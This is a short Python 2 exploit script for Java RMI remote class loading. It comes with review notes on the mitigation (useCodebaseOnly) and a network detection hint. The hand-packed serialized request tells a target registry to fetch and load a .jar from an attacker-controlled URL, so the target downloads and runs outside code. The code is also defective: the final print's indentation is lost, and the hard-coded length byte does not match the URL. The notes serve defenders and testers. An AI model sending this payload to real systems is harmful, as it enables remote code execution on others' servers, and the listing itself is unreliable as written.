Quick and dirty RMI invoker
#!/usr/bin/python
"""
Python implementation of RMI invoker. Should try fetch a .jar from a server we control.
Author: Etienne Stalmans <etienne@sensepost.com>
Version: 08/10/2014 - v0.1

Review notes:
- Python 2 script: it uses the ``print`` statement and passes ``str`` literals
  as raw bytes to ``socket.send`` / ``struct.pack``; it will not run unchanged
  on Python 3.
- The registry address (HOST/PORT) and the codebase URL (fileloc) are
  hard-coded constants; nothing is read from the command line.
- The only outcome reported is the presence of "RMI class loader disabled" in
  the registry's reply, i.e. a registry that refuses to load classes from a
  remote codebase.  That refusal is the expected behaviour of a JVM running
  with ``java.rmi.server.useCodebaseOnly=true`` (the default since Java 7u21);
  keeping that default and not exposing the registry port to untrusted
  networks are the relevant mitigations.
- Network detection hint: a TCP session to the registry port that opens with
  the ``JRMI`` magic and carries a serialized object containing an ``http://``
  URL.
"""
import socket
import binascii
import struct
HOST = '10.10.0.1'  # RMI registry to connect to
PORT = 1099  # default RMI registry port
fileloc = "http://10.10.0.2/myfile.jar"  # codebase URL spliced into the request below
dlen = len(fileloc)
# Hand-packed request: a JRMI protocol header followed by a Java-serialized
# call.  Every element is a fixed byte string except the URL inserted with
# struct.pack; the pieces are concatenated and sent in one call below.
data = ["\x4a\x52\x4d\x49\x00\x02\x4b\x00\x00\x00\x00\x00\x00",
"\x50\xac\xed\x00\x05\x77\x22\x00\x00\x00\x00\x00\x00\x00\x02\x00",
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00",
"\x00\xf6\xb6\x89\x8d\x8b\xf2\x86\x43\x75\x72\x00\x18\x5b\x4c\x6a",
"\x61\x76\x61\x2e\x72\x6d\x69\x2e\x73\x65\x72\x76\x65\x72\x2e\x4f",
"\x62\x6a\x49\x44\x3b\x87\x13\x00\xb8\xd0\x2c\x64\x7e\x02\x00\x00",
"\x70\x78\x70\x00\x00\x00\x00\x77\x08\x00\x00\x00\x00\x00\x00\x00",
"\x00\x73\x72\x00\x14\x6d\x65\x74\x61\x73\x70\x6c\x6f\x69\x74\x2e",
"\x52\x4d\x49\x4c\x6f\x61\x64\x65\x72\xa1\x65\x44\xba\x26\xf9\xc2",
"\xf4\x02\x00\x00\x74\x00",
#struct.pack("h%ds" % (len(fileloc),), len(fileloc), fileloc), #where to download from
"\x1e",struct.pack("%ds"%(len(fileloc),),fileloc),
"\x78\x70\x77\x01\x00\x0a"]
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST,PORT))
s.send(''.join(data))  # single send of the whole request; return value is not checked
dp = s.recv(1024)  # first reply chunk, read and discarded
#print "Response from RMI server: %s"%repr(dp)
dp = s.recv(2024)  # second chunk, also discarded
dp = s.recv(2024)  # only this third chunk is inspected below; the socket is never closed explicitly
#print "Response from RMI server: %s"%repr(dp)
# Marker returned by a registry that refuses to load classes from a remote codebase.
if "RMI class loader disabled" in dp:
print "[x] RMI class loader disabled.. No cigar"  # NOTE(review): body of the if above; its indentation appears to have been lost in the paste